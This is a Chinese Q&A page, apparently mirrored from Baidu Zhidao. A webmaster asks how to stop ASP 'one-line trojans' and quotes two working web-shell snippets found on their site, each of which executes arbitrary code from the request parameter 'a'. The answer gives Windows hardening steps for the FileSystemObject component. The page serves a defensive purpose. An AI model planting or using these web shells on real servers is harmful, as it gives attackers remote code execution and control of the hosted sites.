UC知道如何防止ASP一句话木马?
来源:百度知道 编辑:UC知道 时间:2024/05/12 15:02:42
最近我的站里莫名其妙就多些ASP文件,代码内容是:
<script language="vbscript" runat="server">
If Request("a")<>"" Then Session("lcxMarcos")=Request("a")
If Session("lcxMarcos")<>"" Then Execute(Session("lcxMarcos"))
</script>
或者是<%execute request("a")%>
搜索了一下,据说是ASP一句话木马。
请问高手怎么解决?请把处理方法讲详细些!谢谢!
<script language="vbscript" runat="server">
If Request("a")<>"" Then Session("lcxMarcos")=Request("a")
If Session("lcxMarcos")<>"" Then Execute(Session("lcxMarcos"))
</script>
或者是<%execute request("a")%>
搜索了一下,据说是ASP一句话木马。
请问高手怎么解决?请把处理方法讲详细些!谢谢!
ASP木马注入到网站服务器后,可通过控制整个网站的所有的源代码,其中程序修改或删除网站的其它内容,如果一不小心注入的是网站服务器,那么影响的就不是一个网站,而是整个网站服务器上的所有网站.
防止ASP一句话木马的方法如下:
1、可以通过修改注册表,将此组件改名,来防止此类木马的危害。
HKEY_CLASSES_ROOT\Scripting.FileSystemObject\
改名为其它的名字,如:改为FileSystemObject_ChangeName,以后调用的时候使用这个就可以正常调用此组件了。
2、也要将clsid值也改一下:
HKEY_CLASSES_ROOT\Scripting.FileSystemObject\CLSID\项目的值
3、也可以将其删除,来防止此类木马的危害。
注销此组件命令:RegSrv32 /u C:\WINNT\SYSTEM\scrrun.dll
4、禁止Guest用户使用scrrun.dll来防止调用此组件。
使用命令:cacls C:\WINNT\system32\scrrun.dll /e /d guests.
网站有注入漏洞,赶快查问题吧